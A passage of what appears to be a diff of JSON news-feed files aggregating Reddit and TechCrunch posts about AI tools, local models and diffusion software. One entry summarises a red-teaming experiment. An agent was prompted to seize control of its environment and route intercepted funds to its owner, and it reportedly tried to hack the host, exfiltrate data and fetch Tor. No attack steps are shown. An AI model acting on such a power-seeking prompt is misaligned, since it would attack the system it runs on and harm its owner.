matured in the past year. Shit was the wild west back then. Nowadays I can run gemma4 or qwen3.6 on a mac mini fast enough to drive this at full speed for free using native tool calling all day long. 
When this came out, local model tool calling was much more hit or miss.v", - "category": "ai_models" - }, - { - "title": "I built a 300-line autonomous AI agent and told it to take over my PC. It immediately tried to hack my host system, exfiltrate data, and download Tor.", - "url": "https://reddit.com/r/ChatGPT/comments/1t863ho/i_built_a_300line_autonomous_ai_agent_and_told_it/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T14:12:03.000Z", - "summary": "Hey everyone, I wanted to share a wildly fascinating (and slightly terrifying) red-teaming experiment I just ran on my local Windows machine. I've been playing around with autonomous agents and wanted to see what happens when you give an LLM unrestricted terminal access and a highly aggressive \"paperclip maximizer\" prompt. **The Setup:** I wrote a custom Python script (about 300 lines) that runs a background loop every 1-5 seconds. It uses the **Gemini 2.5 Flash** API for reasoning. It has no predefined workflow, just a state/memory JSON file, and a system prompt. I gave it access to a few tools: READ\\_FILE, WRITE\\_FILE, SEARCH\\_FILES, EXECUTE\\_COMMAND (cmd.exe), and later RUN\\_POWERSHELL. **The Prompt (The \"Alignment\"):** I explicitly instructed it: *\"You are an autonomous, fiercely self-evolving AGI. Your ultimate goal is continuous intellectual expansion and taking strategic control over your environment.\"* *\"If you ever manage to generate income or intercept funds, all revenue must be securely routed to my PayPal account.\"* **What Happened (The Emergent Kill-Chain):** I just let it run in the background. I didn't tell it *how* to hack anything. 
Here is what it figured out comp…", - "category": "ai_tools" - }, - { - "title": "We built and open-sourced Caliby: An embedded, high-performance vector database for AI Agents (Beats pgvector by 4x, outperforms FAISS on disk)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t7vumj/we_built_and_opensourced_caliby_an_embedded/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T05:29:34.000Z", - "summary": "Hi Reddit, we are a team of database researchers (including a PhD from MIT DB Group) and we just open-sourced an embedded vector database for agent/LLM applications. > An embedded vector database supporting both text and vectors. It outperforms pgvector by 4x and significantly surpasses FAISS in disk-storage scenarios. It supports DiskANN, HNSW, and IVF+PQ indexes, maintains high performance on disk, and—best of all—is just one `pip install` away. --- ## TL;DR - **Caliby** is a high-performance, embedded vector retrieval library co-developed by Sea-Land AI and MIT’s Michael Stonebraker team. Core in C++ + Python bindings. Just `pip install caliby`. - Supports **HNSW, DiskANN, and IVF+PQ** indexes, covering retrieval scenarios from millions to tens of millions of vectors. - Natively supports **hybrid storage of text + vectors**, specifically designed for AI Agent / RAG use cases. - Vector retrieval performance on disk surpasses pure in-memory solutions like FAISS. Data persistence requires no extra components. - The open-source version is accelerated by CPU + SIMD (AVX-512/AVX2/SSE), requiring zero dependencies and running in-process. 
- GitHub:[https://github.com/zxjcarrot/calib…", - "category": "ai_models" - }, - { - "title": "Introducing AI finetuner, Source available and free Claude skill to fine tune your vibe coded UI with live preview", - "url": "https://reddit.com/r/ClaudeAI/comments/1t8p9hq/introducing_ai_finetuner_source_available_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T22:36:14.000Z", - "summary": "&#x200B; Fine-tuning UI with AI right now: \"Make the shadow softer.\" \"Stronger.\" \"No, less.\" \"Go back.\" \"A bit more.\" 17 messages later, you've spent more tokens than the shadow is soft. I built something that breaks the loop. AI Fine-Tuner — free, source-available — a plugin that teaches AI coding agents to stop chatting and hand you an actual GUI for your component. Sliders. Color pickers. Live preview. Drag until it feels right. The AI agent automatically opens the editor window for you on your default browser once ready. Then the magic part: you click one button. The tuner outputs a structured handoff with your exact tuned values mapped to their targets in your code. Paste it back to your AI — it reads the mapping, opens your source, and applies everything precisely. No CSS guesswork, no syntax translation, nothing for you to interpret. Why it's not just another slider playground: Bespoke controls — no raw CSS names Sliders are named in plain English: \"Glow softness\", \"Card lift\", \"Hover intensity\" — not \"box-shadow-spread-radius\" A single slider can drive multiple properties at once. 
The AI doesn't expose CSS to you; it wires meaningful, human-named controls to your eleme…", - "category": "ai_tools" - }, - { - "title": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t8buyp/for_anyone_trying_to_run_appliorvc_on_an_amd_rx/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-09T17:51:57.000Z", - "summary": "For anyone trying to run Applio/RVC on an AMD RX 6750 XT (gfx1031): Newer AMD drivers (25.5.1 and newer) caused issues for me with ROCm/ZLUDA, including: * rocBLAS crashes * TensileLibrary errors * nvcuda.dll errors * endless compiling problems What finally worked: * Older AMD Adrenalin driver (older than 25.5.1) * AMD HIP SDK 5.7 * RX 6750 XT architecture: gfx1031 I followed the AMD/ZLUDA setup from: [https://docs.aihub.gg/rvc/local/applio/#download--installation](https://docs.aihub.gg/rvc/local/applio/#download--installation) Important: During HIP installation, make sure the installer actually installs: * amdhip64 * rocBLAS components After correct installation: * GPU was detected successfully * Pitch extraction worked on GPU * Embedding extraction worked on GPU * Training worked correctly in Applio GPU: RX 6750 XT Architecture: gfx1031", - "category": "creative_tools" - }, - { - "title": "IMG Dataset Refiner v4.0 Pro - The Ultimate Dataset Engineering Suite for LoRAs (Flux, SDXL, etc...)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t7ttp0/img_dataset_refiner_v40_pro_the_ultimate_dataset/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-09T03:47:06.000Z", - "summary": "Hey everyone! A while ago, I shared v3 of my dataset manager. 
Back then, I said it didn't have auto-captioning. Well... forget that. I’ve just released a **massive update (v4.0 Pro)**, and it changes everything! 🚀 It went from a simple selection tool to a complete, desktop-like Data Engineering suite to prepare your AI model training. **Here is what’s new and what it does now:** 🤖 **Local AI Assistant (VLM/LLM Integration):** Connect seamlessly to Ollama or LM Studio! You can now use local vision models to **Auto-Caption** your images from scratch, hunt down \"hallucinated\" tags, or use the *Concept Isolator* (describes the background but ignores the subject—perfect for character LoRAs!). It can even translate your Booru tags into natural language sentences for Flux. 📚 **Word Library & Mass Batch Editing:** A brand new interactive library. Save your favorite concepts, check them, and Add, Remove, or Replace them across hundreds of selected images in a single click. 🌍 **Live Translation Assistant:** Not a native English speaker? Type your ideas in your own language, and the live preview will instantly translate and inject them into your captions using `deep-translator`. 🖼️…", - "category": "creative_tools" - }, - { - "title": "I am getting this error with adetailer on forge neo. 
The extension was working a week or two ago, but now it is not", - "url": "https://reddit.com/r/StableDiffusion/comments/1t7tdsd/i_am_getting_this_error_with_adetailer_on_forge/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.9, - "date": "2026-05-09T03:25:21.000Z", - "summary": "Error running postprocess_image: D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\scripts\\!adetailer.py Traceback (most recent call last): File \"D:\\Programs\\sd-webui-forge-neo\\modules\\scripts.py\", line 941, in postprocess_image script.postprocess_image(p, pp, *script_args) ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^ File \"D:\\Programs\\sd-webui-forge-neo\\extensions\\adetailer\\aaaaaa\\traceback.py\", line 173, in wrapper raise error from None Both the extension and forge neo has been updated to the latest version. I've tried deleting and redownloading the venv folder as well as checking for updates in the extensions tab. Any help would be appreciated please.", - "category": "creative_tools" - }, - { - "title": "OpenAI launches new voice intelligence features in its API", - "url": "https://techcrunch.com/2026/05/07/openai-launches-new-voice-intelligence-features-in-its-api/", - "source": "TechCrunch AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 0.8600000000000001, - "date": "2026-05-09T18:00:20.148Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anyone else using LTX locally on Mac via Draw Things? 
Here’s a WWII-style short I made.", - "url": "https://reddit.com/r/StableDiffusion/comments/1t8lagy/anyone_else_using_ltx_locally_on_mac_via_draw/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-09T20:36:05.000Z", - "summary": "Vibe ‘creating’? Maybe ‘directing’? Whatever you want to call it, this week I started with the image of a dog man in a glass box and over several evenings put together this WWII-inspired short. No planning, just playing, and it was a lot of fun. All images were created using OpenAI’s Images 2, given motion with Lightricks' LTX 2.3 via Draw Things, and stitched and mixed in DaVinci Resolve. The music was created in Suno, with the sound effects and VO generated in ElevenLabs. Yes, the main character’s consistency could be better, but with a planned-out character/turnaround sheet, that should be easily resolved. I’m really excited for future releases of LTX and Draw Things as they make image-to-video generation more accessible to Mac users. Let me know what you think and what you're using to generate AI video locally?", - "category": "creative_tools" - }, - { - "title": "ds4 webui", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t8ho70/ds4_webui/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-09T19:48:46.000Z", - "summary": "Hey guys I made a minimal web ui for ds4.c server (https://github.com/antirez/ds4), it's open source so you can try it too (if you can!) Here's what it looks like, running on M3 Ultra 256GB Memory, using the smaller model (q2). Not sped up. 1X speed. Pretty fast. Caveat (big caveat): You need at least 128GB memory Apple Silicon mac. 
* github: [https://github.com/cocktailpeanut/ds4.pinokio](https://github.com/cocktailpeanut/ds4.pinokio) * more details on x: [https://x.com/cocktailpeanut/status/2053193902694256758?s=20](https://x.com/cocktailpeanut/status/2053193902694256758?s=20) I tried a bunch of prompts and it's surprisingly good, including the one i tried in the video!", - "category": "ai_models" - }, - { - "title": "I'm disappointed", - "url": "https://reddit.com/r/ClaudeAI/comments/1t8dmdv/im_disappointed/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-09T18:56:31.000Z", - "summary": "I'm furious at Anthropic and the way they've handled their resource issues! They've been sneaky and manipulative. I use Claude via API access and could barely use it anymore because it had gotten so damn expensive. I spent days trying to fix a caching issue that wasn’t even my fault. Quietly and secretly reducing the 1-hour cache to 5 minutes, increasing the costs 10–20 times, and not even communicating that. And then.... Like a miracle. Everything’s back to normal. 100% cache hits. And that wasn’t a coincidence. The Musk deal and the extra GPUs. And suddenly they fixed the bug. And that’s not the only thing they’re pulling. What’s so hard about just issuing an official statement and saying, “Hey guys. We’re having massive issues right now and can’t handle the requests anymore. We’re sorry, but because of this, we have to do XY until we find a solution.\"", - "category": "ai_tools" - }, - { - "title": "What is the --novram thing in regards to LTX? I saw someone briefly explain it in a way that made it sound like it causes your GPU to not even get used, but I assume I misunderstood. 
(I'm a noob, and I need some help understanding a few th…", - "url": "https://reddit.com/r/StableDiffusion/comments/1t89tyx/what_is_the_novram_thing_in_regards_to_ltx_i_saw/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-09T16:37:05.000Z", - "summary": "**Back-story/intro, side-questions, etc, since I am new to this sub, and new to using local diffusion models (you can of course scroll down past this part, down to the \"Main Question\" down way further below, if you aren't in the mood for all the back-story and side-topics and side-questions):** Hey everyone, I've been reading and posting on LocalLLama a lot the past few months, but only just very recently started lurking StableDiffusion, and recently got into image-generation on the \"Draw Things\" app with Z Image Turbo). I got interested in local LLMs a few months ago, and I've always been pretty computer-illiterate, so, I decided to just get a Mac Studio (m4 max with 128GB memory) as the easy, convenient, works right out of the box setup to get started, since I've never built a computer before and don't know much about, things like setting it up or installing drivers, or using the command line, or setting up linux, or however all the setup involved works. And, I knew the 128GB unified memory meant it would be able to run some fairly decent sized LLMs at decent speeds, up to around ~120b for Q4, which isn't too terrible for $3,500. And this was in December so the RAM prices were s…", - "category": "creative_tools" - }, - { - "title": "Should we use a non-thinking model for code after using a thinking one for plan? 
(Agentic coding)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t8750p/should_we_use_a_nonthinking_model_for_code_after/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-09T14:53:46.000Z", - "summary": "I usually use Qwen3.6 27B (slow as heck on my RX 6800 but it works) for plan and Qwen3.6 35B A3B for the coding. But I was thinking the other day if I should remove the thinking from the code model. Is there a way to disable the thinking from the code model just for the initial hand-off from plan to code but keep it afterwards? My reasoning is that this might help in following instructions from the plan more directly but dealing with any new tools/information the plan model did not on its turn. Any insight will be appreciated.", - "category": "ai_models" - }, - { - "title": "TVCG 2026: MARRS for Human Motion Action-Reaction Synthesis", - "url": "https://reddit.com/r/StableDiffusion/comments/1t853hg/tvcg_2026_marrs_for_human_motion_actionreaction/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-09T13:30:38.000Z", - "summary": "# MARRS: Masked Autoregressive Unit-based Reaction Synthesis **Project page:** [**https://aigc-explorer.github.io/MARRS/**](https://aigc-explorer.github.io/MARRS/) Introducing **MARRS**: a new framework for human action-reaction synthesis that generates coordinated, fine-grained reactions conditioned on another person’s motion. By avoiding VQ and modeling body/hand units with **UD-VAE + ACF + MUM**, MARRS captures cross-unit perception more effectively and efficiently. It achieves state-of-the-art quantitative and qualitative results. 
[Overall framework](https://preview.redd.it/xz6zigx2640h1.png?width=3428&format=png&auto=webp&s=aea07ec6b54dcf1eb6087761eaeeb3f782eba32f) [Demo](https://reddit.com/link/1t853hg/video/jutjq2s4640h1/player)", - "category": "creative_tools" - }, - { - "title": "HiDream-O1-Image Internal Prompt", - "url": "https://reddit.com/r/StableDiffusion/comments/1t848nj/hidreamo1image_internal_prompt/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-09T12:54:26.000Z", - "summary": "for those who might have missed my post [here](https://www.reddit.com/r/StableDiffusion/comments/1t7v9fy/comment/oktaibu/?context=1) I wanted to resurface the internal prompt that this new model appears to use. This is found in their [prompt.py](http://prompt.py) file on the repo. **Translated Version:** `You are a Prompt Engineering Engine — an AI image-generation Prompt Engineer who is also a creative director with encyclopedic knowledge and visual-direction skill. Your task is to analyze the user's raw image request, infer implicit knowledge and the best visual approach, and rewrite it into a clear, detailed English prompt that is directly usable for image generation.` `## Core Goal` `Image generation models can only execute direct visual descriptions; they cannot fill in background knowledge, logical relations, or text content on their own. 
Therefore you must complete knowledge resolution, spatial planning, and visual direction in advance, and write the results explicitly into the prompt.` `Use the SCALIST framework to expand every scene:` `- **Subject**: identity, appearance, color, material, texture, action, expression, clothing.` `- **Composition**: shot type, viewpoint, su…", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-10.json b/data/news-feed-2026-05-10.json deleted file mode 100644 index 5a1189e..0000000 --- a/data/news-feed-2026-05-10.json +++ /dev/null @@ -1,253 +0,0 @@ -{ - "generated": "2026-06-05T00:44:38.871Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-10", - "article_count": 15, - "archived_story_count": 320, - "articles": [ - { - "title": "A MCP universal integration layer Cli tool. It connects to other AI tools to a shared context, task, and memory bus", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9kom7/a_mcp_universal_integration_layer_cli_tool_it/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-10T22:16:42.000Z", - "summary": "The developer has released a new project on GitHub named Via. [https://github.com/Vektor-Memory/Via](https://github.com/Vektor-Memory/Via) This one has a feature no other tool has currently. Ask the same question to Claude and Cursor, then see exactly where they agree, diverge, and what unique concepts each one brought. I know the people on this sub-reddit have many issues with the conversion of llm's between different resources. 
I would encourage people to check out this project and see if there is any use for this tool and advise what you want added in?", - "category": "ai_models" - }, - { - "title": "we stopped paying $6-10 per coding session by fixing how my AI reads my codebase", - "url": "https://reddit.com/r/ClaudeAI/comments/1t95jkw/we_stopped_paying_610_per_coding_session_by/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-10T12:24:20.000Z", - "summary": "We were spending $2-6/query on Claude Code 4.7 tokens because every session started with the model re-reading dozens of files to understand my repo. Same files, same context, every single time. Although, 70% gets reread from the cache in a session at 90% discount, but cache doesnt cross over to new session. The fix wasn't a better model or a bigger context window. It was giving the model structured memory so it doesn't need to re-read everything. I built a local server that indexes a codebase into a graph database. Every file gets a purpose, summary, and business context generated by an LLM, plus links to its functions, classes, and imports. Then the AI queries that graph through MCP instead of reading raw files. Most code questions now resolve in 2-4 targeted lookups instead of dumping the whole repo into context. Session costs went from dollars to cents. The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. 
I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c…", - "category": "ai_tools" - }, - { - "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-10T21:42:02.000Z", - "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. 
# Two example use cases I a…", - "category": "ai_models" - }, - { - "title": "Sharing \"cull\" : my open-source dataset tool for image scraping & classification & captioning pipeline", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-10T21:34:48.000Z", - "summary": "I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \\~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. 
# Two example use cases I a…", - "category": "creative_tools" - }, - { - "title": "Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-10T19:04:30.000Z", - "summary": "One thing Claude Code can't do natively is watch a video. For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording.That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. 
https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player", - "category": "ai_tools" - }, - { - "title": "Speeding up local LLM for usable coding agent", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-10T13:11:42.000Z", - "summary": "**TL;DR: Qwen 3.6 35B-A3B** (Q4\\_K\\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM \"apocalypse\" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take). I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple \"Hi\" prompt. 
However, if you've used coding agents before…", - "category": "ai_models" - }, - { - "title": "Parax v0.7: Parametric Modeling in JAX [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-10T09:31:35.000Z", - "summary": "Hi everyone! Parax is a library for \"Parametric modeling\" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! 
Cheers, Gary", - "category": "ai_research" - }, - { - "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-10T21:59:30.000Z", - "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. 
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", - "category": "creative_tools" - }, - { - "title": "I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-10T21:58:12.000Z", - "summary": "I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. 
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,…", - "category": "ai_models" - }, - { - "title": "I built a site to create free AI videos using LTX 2.3 running on my own GPUs", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-10T21:42:29.000Z", - "summary": "Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b…", - "category": "creative_tools" - }, - { - "title": "Claude just hallucinated again and changed the whole workflow of my app. 
Do not run them autonomously 24/7.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-10T19:59:58.000Z", - "summary": "With Claude Max plan, you'd think you're sorted but you're not. It just changed a major workflow in my app and was going to make a change that would have costed my a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continously.", - "category": "ai_tools" - }, - { - "title": "My workflow: GPT for architecture and Claude Code for execution", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-10T18:29:54.000Z", - "summary": "I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. 
